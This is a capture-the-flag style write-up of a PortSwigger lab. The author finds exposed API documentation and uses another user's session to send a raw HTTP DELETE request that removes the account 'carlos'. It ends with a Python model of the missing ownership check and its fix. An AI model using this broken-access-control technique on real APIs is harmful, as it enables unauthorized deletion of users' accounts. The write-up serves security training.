Exploiting an API endpoint using documentation

Description

To solve the lab, find the exposed API documentation and delete carlos. You can log in to your own account using the following credentials: wiener:peter.

Approach

After accessing the lab, I enabled the FoxyProxy extension to proxy all my requests through Burp Suite and checked whether any of them reached an API. I found this interesting request, responsible for updating the user's email:

PATCH /api/user/wiener HTTP/2
Host: 0aea008d0455e11280ddccf50093003e.web-security-academy.net
Cookie: session=p2yDPKo5YuSHESa19Iq1ws5aBLHJGCgk
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
...

{"email":"qwe@qwe.com"}

This request targets the endpoint /api/user/wiener. To start the analysis, I investigated the parent paths:

  • /api/user/

  • /api/

The one that caught my attention was /api, which served full documentation for the API. This documentation included details on how to update the email, as shown below:

PATCH   *Verb*
/user/[username]  *Endpoint*
email: String    *Parameters*

I also discovered how to delete a user:

DELETE   *Verb*
/user/[username]  *Endpoint*

To proceed, I crafted this request to delete the user Carlos:

DELETE /api/user/carlos HTTP/2
Host: 0aea008d0455e11280ddccf50093003e.web-security-academy.net
Cookie: session=p2yDPKo5YuSHESa19Iq1ws5aBLHJGCgk
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
...

I received this response, confirming that the user was deleted:

HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Length: 25

{"status":"User deleted"}

Deleting the carlos user solves the lab. The root cause is that the API authenticates the session but never checks that the session owner matches the [username] in the path, so any logged-in user can modify or delete any other account.
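To show the missing check, here is an added example (my own code, not the lab's or PortSwigger's) modelling the documented /user/[username] PATCH and DELETE routes. Session values and accounts are constructed; with enforce_ownership=False it reproduces the lab's behaviour, and with the default True the same request from wiener's session is refused.

```python
# Added example (not from the lab or PortSwigger): a minimal model of the
# /api/user/[username] routes documented above, with the missing ownership
# check that let wiener's session delete carlos, and the fixed behaviour.
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample data: session cookie values and the accounts they belong to.
SESSIONS = {"sess-wiener": "wiener", "sess-carlos": "carlos"}

@dataclass
class UserApi:
    users: dict = field(default_factory=lambda: {"wiener": "w@example.test", "carlos": "c@example.test"})
    enforce_ownership: bool = True  # False reproduces the lab's behaviour

    def _authorize(self, session: Optional[str], username: str):
        """Return (status, body) on denial, or None when the caller may proceed."""
        caller = SESSIONS.get(session or "")
        if caller is None:
            return 401, {"error": "login required"}
        # Object-level authorization: a session may only act on its own account.
        # Runs before the existence check so a 403/404 difference cannot be
        # used to enumerate usernames.
        if self.enforce_ownership and caller != username:
            return 403, {"error": "forbidden"}
        if username not in self.users:
            return 404, {"error": "no such user"}
        return None

    def handle(self, method: str, path: str, session: Optional[str] = None, body=None):
        parts = path.strip("/").split("/")
        if len(parts) != 3 or parts[:2] != ["api", "user"]:
            return 404, {"error": "not found"}
        username = parts[2]
        denied = self._authorize(session, username)
        if denied:
            return denied
        if method == "PATCH":
            email = (body or {}).get("email")
            if not isinstance(email, str) or "@" not in email:
                return 400, {"error": "email must be a string containing '@'"}
            self.users[username] = email
            return 200, {"username": username, "email": email}
        if method == "DELETE":
            del self.users[username]
            return 200, {"status": "User deleted"}
        return 405, {"error": "method not allowed"}
```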